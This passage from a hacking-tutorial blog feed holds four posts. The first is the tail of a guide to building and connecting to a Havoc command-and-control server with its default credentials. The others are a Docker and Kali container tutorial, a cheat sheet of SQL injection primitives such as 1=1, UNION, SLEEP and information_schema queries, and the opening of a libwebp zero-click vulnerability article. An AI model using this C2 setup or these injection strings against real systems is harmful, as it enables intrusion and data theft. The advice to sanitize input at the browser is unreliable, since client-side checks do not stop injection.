  1295. <p><span style="color: #000000;">and if all goes well, you should see the following:</span></p>
  1296. <p><br /></p>
  1297. <figure><img src="https://static.wixstatic.com/media/6a4a49_9b185f4128864a0d8647c145e291fb42~mv2.png/v1/fit/w_557,h_182,al_c,q_80/file.png"></figure>
  1298. <p><br /></p>
  1299. <p style="text-align: justify;"><span style="color: #000000;">now if you do an</span> <span style="color: #67ed1a;"><span style="background-color: #292f33;">ls</span></span> <span style="color: #000000;">command you will be able to see the directories that appear in the image below, then execute</span><span style="color: #374151;"> </span><span style="color: #67ed1a;"><span style="background-color: #292f33;">cd Havoc</span></span>:</p>
  1300. <p><br /></p>
  1301. <figure><img src="https://static.wixstatic.com/media/6a4a49_b2956745d0704e9b95aa50e8c5c785f8~mv2.png/v1/fit/w_535,h_569,al_c,q_80/file.png"></figure>
  1302. <p><br /></p>
  1303. <p style="text-align: justify;"><span style="color: #E51932;"><strong>Step 2.</strong></span><strong> </strong><span style="color: #000000;">You are now inside of Havoc directory and there you will execute the following:</span></p>
  1304. <p><br /></p>
  1305. <p style="text-align: justify;"><span style="color: #67ed1a;"><span style="background-color: #292f33;">sudo apt install -y git build-essential apt-utils cmake libfontconfig1 libglu1-mesa-dev libgtest-dev libspdlog-dev libboost-all-dev libncurses5-dev libgdbm-dev libssl-dev libreadline-dev libffi-dev libsqlite3-dev libbz2-dev mesa-common-dev qtbase5-dev qtchooser qt5-qmake qtbase5-dev-tools libqt5websockets5 libqt5websockets5-dev qtdeclarative5-dev golang-go qtbase5-dev libqt5websockets5-dev python3-dev libboost-all-dev mingw-w64 nasm</span></span></p>
  1306. <p><br /></p>
  1307. <figure><img src="https://static.wixstatic.com/media/6a4a49_2928352349fa4d70b7c524477ef0c9b7~mv2.png/v1/fit/w_541,h_343,al_c,q_80/file.png"></figure>
  1308. <p><br /></p>
  1309. <p style="text-align: justify;"><span style="color: #000000;">By doing this, you will be installing a variety of packages necessary for the proper functioning of our Command and Control server and if all goes well, you should see the following:</span></p>
  1310. <p><br /></p>
  1311. <figure><img src="https://static.wixstatic.com/media/6a4a49_3d486c8dde334957b781d2d588c0dfd7~mv2.png/v1/fit/w_544,h_252,al_c,q_80/file.png"></figure>
  1312. <p><br /></p>
  1313. <p><span style="color: #000000;">then you need to get into the teamserver directory by doing</span> <span style="color: #67ed1a;"><span style="background-color: #292f33;">cd teamserver</span></span><span style="color: #292f33;"> </span><span style="color: #000000;">and if you do an </span><span style="color: #67ed1a;"><span style="background-color: #000000;">ls</span></span><span style="color: #000000;"> you should see what appears in the image below:</span></p>
  1314. <p><br /></p>
  1315. <figure><img src="https://static.wixstatic.com/media/6a4a49_a1fc40f8bca74fa69253a20f10623816~mv2.png/v1/fit/w_464,h_242,al_c,q_80/file.png"></figure>
  1316. <p><br /></p>
  1317. <p><span style="color: #E51932;"><strong>Step 3.</strong></span> <span style="color: #000000;">Now you have to execute the following:</span></p>
  1318. <p><br /></p>
  1319. <p><span style="color: #67ed1a;"><span style="background-color: #292f33;">go mod download golang.org/x/sys</span></span></p>
  1320. <p><span style="color: #67ed1a;"><span style="background-color: #292f33;">go mod download github.com/ugorji/go</span></span>
  1321.  
  1322. <span style="color: #000000;">If everything goes well, you should see something similar to what appears in the figure below, after which you will need to exit that directory by executing</span><span style="color: #374151;"> </span><span style="color: #67ed1a;"><span style="background-color: #292f33;">cd ..</span></span></p>
  1323. <p><br /></p>
  1324. <figure><img src="https://static.wixstatic.com/media/6a4a49_43c1644578434e89bb8afb5a7a4c5d80~mv2.png/v1/fit/w_464,h_300,al_c,q_80/file.png"></figure>
  1325. <p><br /></p>
  1326. <p><span style="color: #E51932;"><strong>Step 4.</strong></span> <span style="color: #000000;">Now from Havoc Root directory, we will build the server side by executing:</span></p>
  1327. <p><br /></p>
  1328. <p><span style="color: #67ed1a;"><span style="background-color: #292f33;">make ts-build</span></span></p>
  1329. <figure><img src="https://static.wixstatic.com/media/6a4a49_1564a6c7d3624848a0d844e50be6c371~mv2.png/v1/fit/w_537,h_579,al_c,q_80/file.png"></figure>
  1330. <p><br /></p>
  1331. <p><span style="color: #000000;">If everything goes well, you should see something similar to what appears in the figure below:</span></p>
  1332. <figure><img src="https://static.wixstatic.com/media/6a4a49_1c13021a4b564c3b816c1af3c2b8f363~mv2.png/v1/fit/w_543,h_227,al_c,q_80/file.png"></figure>
  1333. <p><br /></p>
  1334. <p style="text-align: justify;"><span style="color: #000000;">Now we&apos;ll need to run the teamserver, but first, I recommend that you split your terminal screen into two with a vertical view this is to facilitate simultaneous monitoring and operation, especially useful when working with Command and Control servers like we are doing here.</span></p>
  1335. <p><br /></p>
  1336. <p><span style="color: #000000;">Execute the following:</span></p>
  1337. <p><span style="color: #67ed1a;"><span style="background-color: #292f33;">./havoc</span></span></p>
  1338. <figure><img src="https://static.wixstatic.com/media/6a4a49_435f7716beb34481bbf4140ab24b2958~mv2.png/v1/fit/w_559,h_159,al_c,q_80/file.png"></figure>
  1339. <p><br /></p>
  1340. <p><span style="color: #000000;">after that, you should see something like this: </span></p>
  1341. <p><br /></p>
  1342. <figure><img src="https://static.wixstatic.com/media/6a4a49_272381285d1c4ceab3cec0e981e254a8~mv2.png/v1/fit/w_543,h_280,al_c,q_80/file.png"></figure>
  1343. <p><br /></p>
  1344. <p><span style="color: #E51932;"><strong>Step 5.</strong></span><strong> </strong><span style="color: #000000;">Now we have the split view so on the left screen we have the teamserver running and on the right screen let&apos;s build the client side by executing the following:</span></p>
  1345. <p><br /></p>
  1346. <p><span style="color: #67ed1a;"><span style="background-color: #000000;">cd Havoc</span></span></p>
  1347. <p><span style="color: #67ed1a;"><span style="background-color: #292f33;">make client-build</span></span></p>
  1348. <p><br /></p>
  1349. <figure><img src="https://static.wixstatic.com/media/6a4a49_dd30cd6e11c04a7da03f5ef56b08542e~mv2.png/v1/fit/w_1000,h_322,al_c,q_80/file.png"></figure>
  1350. <p><br /></p>
  1351. <p><span style="color: #000000;">after this, we will run the client like we did with the server:</span></p>
  1352. <p><span style="color: #67ed1a;"><span style="background-color: #292f33;">./havoc client</span></span></p>
  1353. <figure><img src="https://static.wixstatic.com/media/6a4a49_18b66ae869b94cc590046803ad8d7519~mv2.png/v1/fit/w_916,h_155,al_c,q_80/file.png"></figure>
  1354. <p><br /></p>
  1355. <p><span style="color: #000000;">after this process, you should see this screen:</span></p>
  1356. <p><br /></p>
  1357. <figure><img src="https://static.wixstatic.com/media/6a4a49_dc53eefec53e4f0c9218fd60defdb110~mv2.png/v1/fit/w_926,h_514,al_c,q_80/file.png"></figure>
  1358. <p><br /></p>
  1359. <p><span style="color: #000000;">Now to fill that prompt you have to follow the next step:</span></p>
  1360. <p><br /></p>
  1361. <p><span style="color: #E51932;"><strong>Step 6.</strong></span> <span style="color: #000000;">Open up a new terminal and execute the following commands</span></p>
  1362. <p><br /></p>
  1363. <p>1. <span style="color: #67ed1a;"><span style="background-color: #292f33;">cd Havoc</span></span></p>
  1364. <p>2. <span style="color: #67ed1a;"><span style="background-color: #292f33;">ls</span></span></p>
  1365. <p>3. <span style="color: #67ed1a;"><span style="background-color: #292f33;">cd data</span></span></p>
  1366. <p>4. <span style="color: #67ed1a;"><span style="background-color: #292f33;">ls</span></span></p>
  1367. <p>5. <span style="color: #67ed1a;"><span style="background-color: #292f33;">mousepad havoc.yaotl</span></span></p>
  1368. <p><br /></p>
  1369. <figure><img src="https://static.wixstatic.com/media/6a4a49_d969927265df47a4a387557edf3134b2~mv2.png/v1/fit/w_517,h_589,al_c,q_80/file.png"></figure>
  1370. <p><br /></p>
  1371. <p><span style="color: #000000;">and what you will see is the actual C2 profile and you need the Data that you have inside that file to fill the final prompt we got in</span> <span style="color: #E51932;"><a href="#eidkn" rel="noopener noreferrer">Step 5</a></span> <span style="color: #000000;">and what you will actually use is the following:</span></p>
  1372. <p><br /></p>
  1373. <ol>
  1374.  <li><p><span style="color: #ffffff;"><span style="background-color: #292f33;">Port: 40056</span></span></p></li>
  1375.  <li><p><span style="color: #ffffff;"><span style="background-color: #292f33;">User: Neo</span></span></p></li>
  1376.  <li><p><span style="color: #ffffff;"><span style="background-color: #292f33;">Password: password1234</span></span></p></li>
  1377. </ol>
  1378. <p><span style="color: #000000;">Those are the default credentials:</span></p>
  1379. <figure><img src="https://static.wixstatic.com/media/6a4a49_eb0e0266ee7048e4989ac1040ab97b3a~mv2.png/v1/fit/w_534,h_404,al_c,q_80/file.png"></figure>
  1380. <p><br /></p>
  1381. <p><span style="color: #000000;">Now you can close the mousepad and then go to your terminal and get the IP of your virtual machine by using the command</span> <span style="color: #67ed1a;"><span style="background-color: #292f33;">ifconfig</span></span></p>
  1382. <p><span style="color: #000000;">Now use all the information you have to fill </span>in <span style="color: #000000;">the prompt like the one you see in the picture below, you can choose the name you want I choose Demon.</span></p>
  1383. <p><br /></p>
  1384. <figure><img src="https://static.wixstatic.com/media/6a4a49_4f45f94cb9ae427f900301f3da8928a4~mv2.png/v1/fit/w_429,h_244,al_c,q_80/file.png"></figure>
  1385. <p><br /></p>
  1386. <p style="text-align: justify;"><span style="color: #000000;">Now hit the </span><span style="color: #000000;"><span style="background-color: #e36fe9;"><strong>Connect</strong></span></span><span style="color: #000000;"><strong> </strong></span><span style="color: #000000;">button and you will be good to go, the final screen you will get is the one below and if you are watching this is because you are now in control of your own C2 Server.</span></p>
  1387. <p><br /></p>
  1388. <figure><img src="https://static.wixstatic.com/media/6a4a49_72376fa2c3764e8f97756ee3d05c91b3~mv2.png/v1/fit/w_1000,h_436,al_c,q_80/file.png"></figure>
  1389. <p><span style="color: #000000;">Next time we will teach you how to Operate and control the victim machine with your C2.</span></p>
  1390. <p style="text-align: justify;"><em><span style="color: #000000;"><strong>Smouk out!</strong></span></em></p>
  1391. <p><br /></p>
  1392. <p style="text-align: justify;"><em><span style="color: #000000;">If you liked what you saw, you might be interested in our </span></em><em><span style="color: #0D12E9;"><strong>Hacking Infrastructure course</strong></span></em><em><span style="color: #000000;">, or perhaps you&apos;d like to consider becoming part of our community by becoming a </span></em><em><span style="color: #0D12E9;"><strong>Subscriber PRO.</strong></span></em></p>
  1393. <p><br /></p>]]></content:encoded></item><item><title><![CDATA[Getting Started with Docker, Part 1: Installing Kali Linux in a docker Container]]></title><description><![CDATA[Welcome back, my aspiring cyberwarriors! Increasingly, we are seeing cybersecurity tools and apps using docker. For instance, in my...]]></description><link>https://www.hackers-arise.com/post/getting-started-with-docker-part-1</link><guid isPermaLink="false">653195897bdc9c39f7e1d582</guid><pubDate>Fri, 20 Oct 2023 19:03:43 GMT</pubDate><enclosure url="https://static.wixstatic.com/media/6a4a49_cc1ac6a2d77d4fa0bebe3b96b0680fb2~mv2.png/v1/fit/w_800,h_236,al_c,q_80/file.png" length="0" type="image/png"/><dc:creator>otw</dc:creator><content:encoded><![CDATA[<p><br /></p>
  1394. <p style="text-align: justify;">Welcome back, my aspiring cyberwarriors!</p>
  1395. <p><br /></p>
  1396. <p style="text-align: justify;">Increasingly, we are seeing cybersecurity tools and apps using docker. For instance, in my tutorial on<u><a href="https://www.hackers-arise.com/post/ip-camera-hacking-hacking-ip-cameras-with-cameradar" target="_blank"> </a></u><u><a href="https://www.hackers-arise.com/post/ip-camera-hacking-hacking-ip-cameras-with-cameradar" target="_blank"><span style="color: #0D12E9;">IP camera credential brute forcing</span></a></u>, we used docker to contain our app. To help you understand docker, Aircorridor has written a short tutorial here to explain what it is and how it works.</p>
  1397. <p style="text-align: justify;">
  1398.  
  1399. </p>
  1400. <h2><strong>What is Docker?</strong></h2>
  1401. <p style="text-align: justify;">
  1402. Docker is an open-source platform for developing, shipping, and running applications. It uses <span style="color: #0D12E9;">OS (operating system)-level virtualization</span> to create containers, which are lightweight, standalone packages<span style="color: #0D12E9;"> that include everything an application needs</span> to run: code, libraries, and dependencies. Containers isolate applications from the underlying system, making them consistent and portable.</p>
  1403. <p><br /></p>
  1404. <p style="text-align: justify;">Docker simplifies the process of managing software by ensuring that what you develop and test in one environment, will work reliably in another.</p>
  1405. <p><br /></p>
  1406. <h2></h2>
  1407. <figure><img src="https://static.wixstatic.com/media/6a4a49_cc1ac6a2d77d4fa0bebe3b96b0680fb2~mv2.png/v1/fit/w_800,h_236,al_c,q_80/file.png"></figure>
  1408. <p style="text-align: justify;">
  1409. <strong>Get to know why and how it replace virtual machines</strong></p>
  1410. <h2></h2>
  1411. <p style="text-align: justify;">Docker containers replace virtual machines by virtualizing the operating system instead of the hardware. This means that Docker containers are more lightweight and efficient than virtual machines, and they can be used to run multiple applications on a single host machine.</p>
  1412. <p><br /></p>
  1413. <p style="text-align: justify;"><strong>Traditional virtual machines</strong> create a complete operating system environment for each virtual machine, including its own kernel, libraries, and applications. This means that each virtual machine requires its own share of the host machine&apos;s resources, such as CPU, memory, and disk space.</p>
  1414. <p><br /></p>
  1415. <p style="text-align: justify;"><strong>Docker containers</strong>, on the other hand, share the host machine&apos;s kernel and libraries. This means that Docker containers are much smaller and more efficient than virtual machines. Docker containers can also be started up and stopped much faster than virtual machines.</p>
  1416. <p style="text-align: justify;">
  1417. <strong>Docker containers are tied to the underlying operating system, so you cannot run Windows containers on Linux systems or vice versa.</strong></p>
  1418. <p><br /></p>
  1419. <p><br /></p>
  1420. <figure><img src="https://static.wixstatic.com/media/6a4a49_2319cd15768347e8a4c7b5f152812b5b~mv2.png/v1/fit/w_829,h_299,al_c,q_80/file.png"></figure>
  1421. <p><br /></p>
  1422. <p><br /></p>
  1423. <h2><strong>How to Install docker on Linux</strong></h2>
  1424. <p style="text-align: justify;"><strong> </strong></p>
  1425. <p style="text-align: justify;">To install Docker on Debian-based Linux systems, run the following command:</p>
  1426. <p><br /></p>
  1427. <p style="text-align: justify;"><em><strong>sudo apt install docker.io -y</strong></em></p>
  1428. <p><br /></p>
  1429. <p><br /></p>
  1430. <figure><img src="https://static.wixstatic.com/media/6a4a49_9a03e318e0664a5e91ccf5f0db71cf8e~mv2.png/v1/fit/w_945,h_296,al_c,q_80/file.png"></figure>
  1431. <p><br /></p>
  1432. <p><br /></p>
  1433. <p style="text-align: justify;">If Docker is not enabled or not active after installation, run the following commands:</p>
  1434. <p style="text-align: justify;">
  1435. <em><strong>sudo systemctl enable docker</strong></em></p>
  1436. <p><br /></p>
  1437. <p style="text-align: justify;"><em><strong>sudo systemctl start docker</strong></em></p>
  1438. <p><br /></p>
  1439. <p><br /></p>
  1440. <h2><strong>Installing images</strong></h2>
  1441. <h2></h2>
  1442. <p style="text-align: justify;">After installing Docker, you can start installing images by pulling and running them as containers. To try out the pre-built penetration testing Kali OS images from Offensive Security, download them from the official site kali.org. Once you have chosen a containerized application, you will be redirected to Docker Hub, where you can also search for other images.</p>
  1443. <p style="text-align: justify;"><strong> </strong></p>
  1444. <p><br /></p>
  1445. <figure><img src="https://static.wixstatic.com/media/6a4a49_80791fce3b4c48bdb147471a52e584f8~mv2.png/v1/fit/w_972,h_683,al_c,q_80/file.png"></figure>
  1446. <p style="text-align: justify;">
  1447. </p>
  1448. <figure><img src="https://static.wixstatic.com/media/6a4a49_7825dfe5bb05406988ea7adbe322aea4~mv2.png/v1/fit/w_1000,h_669,al_c,q_80/file.png"></figure>
  1449. <p style="text-align: justify;">
  1450. </p>
  1451. <p style="text-align: justify;">To pull an image from Docker Hub, you can use the docker pull command with the image name.</p>
  1452. <p style="text-align: justify;">
  1453. <em><strong>sudo docker pull kalilinux/kali-rolling</strong></em></p>
  1454. <p><br /></p>
  1455. <p><br /></p>
  1456. <figure><img src="https://static.wixstatic.com/media/6a4a49_665a80c8ef2b4eb3860426dd5adbac56~mv2.png/v1/fit/w_836,h_187,al_c,q_80/file.png"></figure>
  1457. <p><br /></p>
  1458. <p><br /></p>
  1459. <p style="text-align: justify;">To list all pulled images, run the following command:</p>
  1460. <p style="text-align: justify;">
  1461. <em><strong>sudo docker images</strong></em></p>
  1462. <p><br /></p>
  1463. <p><br /></p>
  1464. <figure><img src="https://static.wixstatic.com/media/6a4a49_bb7f1b18e5e2469597f8daf468e53052~mv2.png/v1/fit/w_836,h_154,al_c,q_80/file.png"></figure>
  1465. <p><br /></p>
  1466. <p><br /></p>
  1467. <p style="text-align: justify;">It&apos;s time to deploy our container using the command:</p>
  1468. <p><br /></p>
  1469. <p style="text-align: justify;"><em><strong>sudo docker run -d -t --name kali kalilinux/kali-rolling</strong></em></p>
  1470. <p><br /></p>
  1471. <p><br /></p>
  1472. <figure><img src="https://static.wixstatic.com/media/6a4a49_9499d3dce0c74fb28e2bc4db44ea30ba~mv2.png/v1/fit/w_836,h_83,al_c,q_80/file.png"></figure>
  1473. <p><br /></p>
  1474. <p style="text-align: justify;">
  1475. Where:
  1476. </p>
  1477. <p style="text-align: justify;"><em><strong>-</strong></em><strong>d    </strong>Run the container in detached mode. This means that the container will run in        the background, even if you exit the terminal window.</p>
  1478. <p><br /></p>
  1479. <p style="text-align: justify;"><strong>-t  </strong>Attach an interactive terminal to the container. This is useful for running commands inside the container.</p>
  1480. <p><br /></p>
  1481. <p style="text-align: justify;"><strong>--name  </strong>Set a custom name for the container.</p>
  1482. <p><br /></p>
  1483. <p style="text-align: justify;"><em><strong>kalilinux/kali-rolling</strong></em><strong> </strong>The name of the Docker image to run as a container.</p>
  1484. <p style="text-align: justify;"><strong> </strong></p>
  1485. <p style="text-align: justify;">To list all the running containers, run the following command:</p>
  1486. <p style="text-align: justify;">
  1487. <em><strong>sudo docker ps</strong></em></p>
  1488. <p><br /></p>
  1489. <p><br /></p>
  1490. <figure><img src="https://static.wixstatic.com/media/6a4a49_7773b941894640d7b56cb17596352912~mv2.png/v1/fit/w_1000,h_111,al_c,q_80/file.png"></figure>
  1491. <p><br /></p>
  1492. <p><br /></p>
  1493. <p style="text-align: justify;">To log in to our container, we can use the “docker exec”command:</p>
  1494. <p><br /></p>
  1495. <p style="text-align: justify;"><em><strong>sudo docker exec -it kali bash</strong></em></p>
  1496. <p><br /></p>
  1497. <figure><img src="https://static.wixstatic.com/media/6a4a49_99c61abf9b9449fab9851420cef48228~mv2.png/v1/fit/w_429,h_349,al_c,q_80/file.png"></figure>
  1498. <p><br /></p>
  1499. <p style="text-align: justify;">
  1500. </p>
  1501. <p style="text-align: justify;">After logging in, you may realize that there are no hacking tools installed in the Kali container. This is because the container is very lightweight and doesn&apos;t come with any preinstalled tools. However, you can easily install any required tools or toolboxes using the apt package manager.</p>
  1502. <p><br /></p>
  1503. <h2><strong>Summary</strong></h2>
  1504. <p><br /></p>
  1505. <p style="text-align: justify;">Docker is becoming very popular among the hacker and cybersecurity industry due to the fact that it enables lightweight virtualization and comes with all the code, libraries and dependencies you need to run the application. This is one more tool in your toolbox that will help you along your path to becoming a Cyberwarrior!</p>]]></content:encoded></item><item><title><![CDATA[Database Hacking: Common SQL Injection Commands]]></title><description><![CDATA[Welcome back, my aspiring cyberwarriors! According to the Open Web Application Security Project (OWASP), command injection is perennially...]]></description><link>https://www.hackers-arise.com/post/database-hacking-common-sql-injection-commands</link><guid isPermaLink="false">652b2b030753fbdb8dfdf97e</guid><pubDate>Wed, 18 Oct 2023 19:54:02 GMT</pubDate><enclosure url="https://static.wixstatic.com/media/6a4a49_d8a3986c58e94ca9804035ba29fda4a4~mv2.png/v1/fit/w_1000,h_720,al_c,q_80/file.png" length="0" type="image/png"/><dc:creator>otw</dc:creator><content:encoded><![CDATA[<p><br /></p>
  1506. <p style="text-align: justify;">Welcome back, my aspiring cyberwarriors!</p>
  1507. <p><br /></p>
  1508. <p style="text-align: justify;">According to the Open Web Application Security Project (OWASP), command injection is perennially one of the most serious and numerous attacks against web applications. In addition, these attacks usually involve serious financial damage to the companies and other institutions as they are attacks against the database, the repository of so much valuable information such as credit card numbers and personally identifiable information (PII).</p>
  1509. <p><br /></p>
  1510. <p style="text-align: justify;"><span style="color: #0D12E9;"><strong>OWASP Top 10</strong></span></p>
  1511. <p><br /></p>
  1512. <figure><img src="https://static.wixstatic.com/media/6a4a49_d8a3986c58e94ca9804035ba29fda4a4~mv2.png/v1/fit/w_1000,h_720,al_c,q_80/file.png"></figure>
  1513. <p><br /></p>
  1514. <p><br /></p>
  1515. <p><br /></p>
  1516. <p style="text-align: justify;">Although there are numerous attack vectors against databases, the most common is the SQL injection. SQL injection sends SQL commands from the web form to the backend database. </p>
  1517. <p><br /></p>
  1518. <p><br /></p>
  1519. <figure><img src="https://static.wixstatic.com/media/6a4a49_cfd10ff6b0d441d0a64ce14d359574c2~mv2.jpg/v1/fit/w_638,h_479,al_c,q_80/file.png"></figure>
  1520. <p><br /></p>
  1521. <p><br /></p>
  1522. <p style="text-align: justify;">If these SQL commands are not sanitized at the client level (browser) they can move to the database and wreak havoc, including;</p>
  1523. <p><br /></p>
  1524. <ol>
  1525.  <li><p style="text-align: justify;">Exfiltrate data</p></li>
  1526.  <li><p style="text-align: justify;">Delete data</p></li>
  1527.  <li><p style="text-align: justify;">Add data</p></li>
  1528.  <li><p style="text-align: justify;">Update data</p></li>
  1529. </ol>
  1530. <p><br /></p>
  1531. <p style="text-align: justify;">When testing for SQL injection vulnerabilities, these are some of the most common commands and special characters. The better you understand SQL, the more successful you will be with SQL injection.</p>
  1532. <p><br /></p>
  1533. <p style="text-align: justify;"><span style="color: #000000;"><strong>Quotes</strong></span></p>
  1534. <p><br /></p>
  1535. <p style="text-align: justify;"><span style="color: #000000;">Single quote (&apos;): Frequently used to terminate string literals.</span></p>
  1536. <p><br /></p>
  1537. <p style="text-align: justify;"><span style="color: #000000;">Double quote (&quot;): Can also be used to terminate string literals in some databases.</span></p>
  1538. <p><br /></p>
  1539. <p><br /></p>
  1540. <p style="text-align: justify;"><span style="color: #000000;"><strong>Comment sequences:</strong></span></p>
  1541. <p><br /></p>
  1542. <p style="text-align: justify;"><span style="color: #000000;">Double dash (--): This is an SQL comment and can be used to nullify the rest of a    query.</span></p>
  1543. <p style="text-align: justify;"><span style="color: #000000;">  </span></p>
  1544. <p style="text-align: justify;"><span style="color: #000000;">Hash (#): In MySQL, it&apos;s an alternate way to comment out the rest of the query.</span></p>
  1545. <p style="text-align: justify;"><span style="color: #000000;">Slash-asterisk (/* ... */): Multiline comment. </span></p>
  1546. <p><br /></p>
  1547. <p style="text-align: justify;"><span style="color: #000000;">Can be used to comment out parts or all of a query.</span></p>
  1548. <p><br /></p>
  1549. <p style="text-align: justify;"><span style="color: #000000;"><strong>Operators and commands:</strong></span></p>
  1550. <p><br /></p>
  1551. <p style="text-align: justify;"><span style="color: #000000;">Semicolon (;): Represents the end of one query and the start of another.</span></p>
  1552. <p><br /></p>
  1553. <p style="text-align: justify;"><span style="color: #000000;">Logical operators: AND, OR.</span></p>
  1554. <p><br /></p>
  1555. <p style="text-align: justify;"><span style="color: #000000;">Control functions: UNION, UNION ALL.</span></p>
  1556. <p><br /></p>
  1557. <p style="text-align: justify;"><span style="color: #000000;"><strong>Boolean values</strong></span></p>
  1558. <p><br /></p>
  1559. <p style="text-align: justify;"><span style="color: #000000;">TRUE or 1=1: Always evaluates to true and can be used to manipulate WHERE clauses.</span></p>
  1560. <p><br /></p>
  1561. <p style="text-align: justify;"><span style="color: #000000;">FALSE or 1=0: Always evaluates to false</span></p>
  1562. <p><br /></p>
  1563. <p style="text-align: justify;"><span style="color: #000000;"><strong>Time-delay functions</strong></span></p>
  1564. <p><br /></p>
  1565. <p style="text-align: justify;"><span style="color: #ffffff;"> </span><span style="color: #000000;">SLEEP(x): In MySQL, causes a delay for x seconds.</span></p>
  1566. <p><br /></p>
  1567. <p style="text-align: justify;"><span style="color: #000000;">  </span></p>
  1568. <p style="text-align: justify;"><span style="color: #000000;">WAITFOR DELAY &apos;hh:mm:ss&apos;: In SQL Server, causes a delay.</span></p>
  1569. <p><br /></p>
  1570. <p style="text-align: justify;"><span style="color: #000000;">pg_sleep(x): In PostgreSQL, causes a delay for x seconds.</span></p>
  1571. <p><br /></p>
  1572. <p><br /></p>
  1573. <p style="text-align: justify;"><span style="color: #000000;"><strong>Information retrieval</strong></span></p>
  1574. <p><br /></p>
  1575. <p style="text-align: justify;"><span style="color: #ffffff;"> </span><span style="color: #000000;">@@version: Retrieves the database version (works in many databases).</span></p>
  1576. <p style="text-align: justify;"><span style="color: #000000;"> </span></p>
  1577. <p style="text-align: justify;"><span style="color: #000000;">CURRENT_USER: Retrieves the current user.</span></p>
  1578. <p><br /></p>
  1579. <p style="text-align: justify;"><span style="color: #000000;"><strong>Hex encoding</strong></span></p>
  1580. <p><br /></p>
  1581. <p style="text-align: justify;"><span style="color: #000000;">Attackers might encode their payloads in hexadecimal to bypass naive filters.</span></p>
  1582. <p><br /></p>
  1583. <p style="text-align: justify;"><span style="color: #000000;"><strong>Wildcards</strong></span></p>
  1584. <p><br /></p>
  1585. <p style="text-align: justify;"><span style="color: #000000;">Percent sign (%): Represents zero or more characters in SQL LIKE clauses. This was used the recent MoveIT attack by C|op.</span></p>
  1586. <p><br /></p>
  1587. <p style="text-align: justify;"><span style="color: #000000;"><strong>Special functions</strong></span></p>
  1588. <p><br /></p>
  1589. <p style="text-align: justify;"><span style="color: #000000;">CONCAT(): Used to concatenate strings in SQL.</span></p>
  1590. <p><br /></p>
  1591. <p style="text-align: justify;"><span style="color: #000000;">CAST(), CONVERT(): Used for type conversion.</span></p>
  1592. <p><br /></p>
  1593. <p style="text-align: justify;"><span style="color: #000000;">ASCII(), CHAR(): Functions to get ASCII values or characters, can be used in blind SQLi.</span></p>
  1594. <p><br /></p>
  1595. <p style="text-align: justify;"><span style="color: #000000;"><strong>Subselects and metadata queries</strong></span></p>
  1596. <p style="text-align: justify;"><span style="color: #ffffff;"> </span><span style="color: #000000;"> </span></p>
  1597. <p style="text-align: justify;"><span style="color: #000000;">SELECT ... FROM information_schema.tables: Used in databases like MySQL and PostgreSQL to gather metadata about tables.</span></p>
  1598. <p style="text-align: justify;"><span style="color: #000000;">  </span></p>
  1599. <p style="text-align: justify;"><span style="color: #000000;">SELECT ... FROM sysobjects ...: Used in SQL Server to gather metadata.</span></p>
  1600. <p><br /></p>
  1601. <h2><strong>Summary</strong></h2>
  1602. <p><br /></p>
  1603. <p style="text-align: justify;">Injection attacks against web forms leading to exfiltration of database data are among the most serious attacks compromising web security. These attacks against the database are using in the form SQLi attacks where SQL commands are sent to the backend database from unsanitized input from the client (browser). Although SQLi attacks are becoming increasingly difficult, a thorough and deep understanding of SQL is necessary to be successful in our more security conscious era.</p>
  1604. <h2></h2>]]></content:encoded></item><item><title><![CDATA[Android Hacking: The libwebp Vulnerability (zero-day/zero-click)]]></title><description><![CDATA[Welcome back, my aspiring cyberwarriors! In recent days, a new and severe vulnerability has been found among the Android ecosystem that...]]></description><link>https://www.hackers-arise.com/post/android-hacking-the-libwebp-vulnerability-zero-day-rce-with-no-user-interaction</link><guid isPermaLink="false">65217582fb6700bac603d4d9</guid><pubDate>Wed, 11 Oct 2023 15:53:39 GMT</pubDate><enclosure url="https://static.wixstatic.com/media/6a4a49_b00ebb52273c42108635b5b116369862~mv2.png/v1/fit/w_800,h_534,al_c,q_80/file.png" length="0" type="image/png"/><dc:creator>otw</dc:creator><content:encoded><![CDATA[<p>Welcome back, my aspiring cyberwarriors!</p>
  1605. <p><br /></p>
  1606. <p style="text-align: justify;">In recent days, a new and severe vulnerability has been found among the Android ecosystem that puts all Android devices, and even Apple iOS devices, at risk.<span style="color: #0D12E9;"> It enables the attacker to send images via SMS and take control of the device with no user interaction! </span>This vulnerability was first identified by Citizen Lab, a research lab based at the University of Toronto and famous for its tracking of the Pegasus malware. The vulnerability was first reported as CVE-2023-41064 but we have since learned that this vulnerability is ubiquitous throughout the Android ecosystem, Google chrome and many other Linux/Unix based systems. In addition, Telegram, the ToR browser, Brave, Gimp, LibreOffice and many other applications are vulnerable. <span style="color: #0D12E9;">This may be one of the most important vulnerabilities of our era!</span></p>
  1607. <p><br /></p>
  1608. <p><br /></p>
  1609. <figure><img src="https://static.wixstatic.com/media/6a4a49_b00ebb52273c42108635b5b116369862~mv2.png/v1/fit/w_800,h_534,al_c,q_80/file.png"></figure>
  1610. <p><br /></p>
  1611. <p><br /></p>
  1612. <p><br /></p>
  1613. <p style="text-align: justify;">The vulnerability involves a library (reusable code) developed by Google over a decade ago to process images known as libwebp. libwebp was designed to be a more efficient method of processing images than say jpeg or other image processes algorithms. As such, it is used throughout the mobile device world and many browsers.</p>
  1614. <p><br /></p>
  1615. <p><br /></p>
  1616. <figure><img src="https://static.wixstatic.com/media/6a4a49_d43519ff90b54e18bfcef19a35994d39~mv2.png/v1/fit/w_773,h_297,al_c,q_80/file.png"></figure>
  1617. <p><br /></p>
  1618. <p><br /></p>
  1619. <p style="text-align: justify;">The danger of this vulnerability is that it enables the attacker to install remote code on the device and take control with NO interaction from the user. </p>
  1620. <p><br /></p>
  1621. <p style="text-align: justify;">Let&apos;s delve a bit deeper into libwebp and this vulnerability.</p>
  1622. <p><br /></p>
  1623. <h2><strong>What is libwebp?</strong></h2>
  1624. <p><br /></p>
  1625. <p style="text-align: justify;">libwebp is a library used by developers to compress graphic files for easier and more efficient transfer over the Internet. Nearly all graphic files you are familiar with such a jpeg, tiff, png, etc. are all compressed file formats. Without these compression algorithms, the Internet would move much slower. We also use compression in audio and video files such as mp3 and mp4.</p>
  1626. <p><br /></p>
  1627. <p style="text-align: justify;">libwebp was developed by Google and is widely used among phones, mobile devices and browsers. It&apos;s compression is significantly superior to other widely used compression algorithms such as jpeg (as much as 30-40% for efficient).</p>
  1628. <h2></h2>
  1629. <h2><strong>What is Lossless and Lossy Compression</strong></h2>
  1630. <h2></h2>
